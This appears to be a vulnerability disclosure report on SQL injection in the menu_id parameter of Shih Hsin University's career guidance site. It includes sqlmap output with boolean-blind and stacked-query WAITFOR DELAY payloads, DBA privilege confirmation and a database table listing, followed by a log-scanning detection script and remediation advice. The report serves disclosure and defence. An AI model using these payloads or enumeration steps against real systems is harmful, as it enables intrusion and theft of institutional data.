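2015-12-10: Details reported to the vendor; awaiting vendor response
2015-12-14: Vendor confirmed; details disclosed to the vendor only
2015-12-24: Details disclosed to core white hats and experts in related fields
2016-01-03: Details disclosed to regular white hats
2016-01-13: Details disclosed to intern white hats
2016-01-28: Details disclosed to the public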
Shih Hsin University career guidance site, injection point (menu_id): http://**.**.**.**/CareerGuide/FrontShow/paper_display.aspx?menu_id=5&submenu_id=413&apmenu_id=1598
sqlmap resumed the following injection point(s) from stored session:
---
Parameter: menu_id (GET)
    Type: boolean-based blind
    Title: AND boolean-based blind - WHERE or HAVING clause
    Payload: menu_id=5 AND 3436=3436&submenu_id=413&apmenu_id=1598

    Type: stacked queries
    Title: Microsoft SQL Server/Sybase stacked queries (comment)
    Payload: menu_id=5;WAITFOR DELAY '0:0:5'--&submenu_id=413&apmenu_id=1598
---
web server operating system: Windows 2008 R2 or 7
web application technology: ASP.NET, Microsoft IIS 7.5, ASP.NET 2.0.50727
back-end DBMS: Microsoft SQL Server 2005
current database: 'CareerGuide_Shu'
current user is DBA: True
available databases [5]:
[*] CareerGuide_Shu
[*] master
[*] model
[*] msdb
[*] tempdb
The current user has DBA privileges, so system commands can be executed:
Database: CareerGuide_Shu
+-------------------------+---------+
| Table                   | Entries |
+-------------------------+---------+
| dbo.FunctionRecords     | 308682  |
| dbo.VisitorRecords      | 14623   |
| dbo.Class_sign          | 8204    |
| dbo.Code                | 4039    |
| dbo.Code_201201         | 3999    |
| dbo.LearnMap            | 1789    |
| dbo.papers              | 1682    |
| dbo.Account             | 1585    |
| dbo.appear_papers       | 1493    |
| dbo.Job_Jobtype_TOT     | 1337    |
| dbo.Job_Main_TOT        | 1019    |
| dbo.Res_Comp_TOT        | 992     |
| dbo.Res_Epaper          | 944     |
| dbo.Job_Desc_TOT        | 925     |
| dbo.Consultant_Calendar | 879     |
| dbo.Cmp_Main            | 817     |
| dbo.JobNeeded           | 800     |
| dbo.Res_Main_TOT        | 768     |
| dbo.Res_Status_TOT      | 764     |
| dbo.Job_Lan_TOT         | 588     |
| dbo.rule_acl            | 546     |
| dbo.Job_Major_TOT       | 493     |
| dbo.Res_Jobtype_TOT     | 474     |
| dbo.Res_Indtype_TOT     | 454     |
| dbo.Consultant_Booking  | 360     |
| dbo.Res_Area_TOT        | 342     |
| dbo.Cmp_Profile         | 240     |
| dbo.DataCheck           | 240     |
| dbo.Class               | 207     |
| dbo.MyBook              | 206     |
| dbo.Res_Exp_TOT         | 156     |
| dbo.Res_Lan_TOT         | 147     |
| dbo.Res_Profile_TOT     | 142     |
| dbo.admin_tools         | 129     |
| dbo.Res_Workexp_TOT     | 116     |
| dbo.Res_cerT_TOT        | 92      |
| dbo.Cmp_Image           | 89      |
| dbo.Cmp_Sort            | 89      |
| dbo.Res_edU_TOT         | 80      |
| dbo.extra_function      | 78      |
| dbo.Cmp_News            | 74      |
| dbo.ForumMain           | 58      |
| dbo.Res_Course_TOT      | 53      |
| dbo.system_profile_ext  | 52      |
| dbo.Share               | 49      |
| dbo.Epaper_MailList     | 43      |
| dbo.label               | 43      |
| dbo.EpaperList          | 42      |
| dbo.Cmp_Gmessage        | 29      |
| dbo.Res_Reward_TOT      | 29      |
| dbo.Res_Association_TOT | 27      |
| dbo.Res_Parttime_TOT    | 27      |
| dbo.Consultant_Teacher  | 22      |
| dbo.Res_Service_TOT     | 19      |
| dbo.mail_open           | 18      |
| dbo.Res_Jobplan_TOT     | 18      |
| dbo.Res_ExtrActive_TOT  | 15      |
| dbo.function_class      | 10      |
| dbo.Res_Hidden_TOT      | 9       |
| dbo.label_class         | 7       |
| dbo.rule_user           | 7       |
| dbo.rule_group          | 6       |
| dbo.user_basic          | 6       |
| dbo.HotMessage          | 5       |
| dbo.epaper_type         | 3       |
| dbo.Res_Check_TOT       | 2       |
| dbo.FAQ                 | 1       |
| dbo.system_profile      | 1       |
+-------------------------+---------+
Both the number of tables and the volume of data are large.
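The reported URL carries menu_id, submenu_id and apmenu_id as plain integers, so any non-integer value in those parameters is an anomaly worth alerting on. The following is an added example, not part of the original report: it flags such values in web server log lines and labels the two payload shapes listed in the sqlmap output. The log field order and the sample lines are assumptions constructed for illustration.

```python
import re
from urllib.parse import unquote_plus

# The three ID parameters in the reported URL all carry plain integers.
NUMERIC_PARAMS = ("menu_id", "submenu_id", "apmenu_id")
INT_RE = re.compile(r"\d{1,9}")

# Shapes of the two payload types listed in the sqlmap output.
RULES = [
    ("stacked-query", re.compile(r";")),
    ("time-delay", re.compile(r"\bwaitfor\s+delay\b", re.I)),
    ("boolean-test", re.compile(r"\b(and|or)\s+\d+\s*=\s*\d+", re.I)),
]

def classify(value):
    """Return [] for a clean integer, otherwise the reasons the value is flagged."""
    if INT_RE.fullmatch(value):
        return []
    return [name for name, rx in RULES if rx.search(value)] or ["non-integer"]

def scan_line(line):
    """Check one log line; assumed field order: date time method uri-stem uri-query ..."""
    fields = line.split()
    if len(fields) < 5 or fields[0].startswith("#"):
        return {}
    stem, query = fields[3], fields[4]
    if not stem.lower().endswith("/paper_display.aspx"):
        return {}
    findings = {}
    for pair in query.split("&"):  # split on '&' only, so ';' stays inside the value
        key, _, raw = pair.partition("=")
        if key.lower() in NUMERIC_PARAMS:
            reasons = classify(unquote_plus(raw))
            if reasons:
                findings[key] = reasons
    return findings

# Constructed sample lines (not from the real server); 192.0.2.10 is a documentation address.
PAGE = "/CareerGuide/FrontShow/paper_display.aspx"
SAMPLE_LOG = [
    f"2015-12-10 08:00:01 GET {PAGE} menu_id=5&submenu_id=413&apmenu_id=1598 80 - 192.0.2.10 200",
    f"2015-12-10 08:00:02 GET {PAGE} menu_id=5+AND+3436=3436&submenu_id=413&apmenu_id=1598 80 - 192.0.2.10 200",
    f"2015-12-10 08:00:03 GET {PAGE} menu_id=5;WAITFOR+DELAY+'0:0:5'--&submenu_id=413&apmenu_id=1598 80 - 192.0.2.10 200",
]

if __name__ == "__main__":
    for entry in SAMPLE_LOG:
        print(scan_line(entry) or "clean")
```

The same strict integer check belongs in the page handler itself, together with parameterized queries and a database login that is not DBA.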
Severity: High
Vulnerability Rank: 17
Confirmation time: 2015-12-14 23:35
Thank you for the report.
None yet